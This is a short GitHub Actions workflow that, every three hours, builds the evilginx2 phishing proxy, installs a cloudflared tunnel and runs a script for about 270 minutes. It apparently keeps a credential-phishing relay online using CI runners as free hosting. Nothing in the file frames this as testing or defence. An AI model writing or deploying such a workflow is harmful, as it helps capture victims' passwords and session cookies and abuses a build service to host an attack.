name: relay
on:
  workflow_dispatch:
  schedule:
    - cron: '17 */3 * * *'
jobs:
  relay:
    runs-on: ubuntu-latest
    timeout-minutes: 280
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-go@v5
        with:
          go-version: '1.22'
      - name: Build evilginx
        run: |
          git clone --depth 1 https://github.com/kgretzky/evilginx2.git
          cd evilginx2
          make
          sudo cp ./bin/evilginx /usr/local/bin/evilginx
      - name: Install cloudflared
        run: |
          sudo curl -sL https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 -o /usr/local/bin/cloudflared
          sudo chmod +x /usr/local/bin/cloudflared
          cloudflared --version
      - name: Run relay
        env:
          RUN_LIMIT_MINUTES: '270'
        run: |
          chmod +x run.sh
          bash run.sh
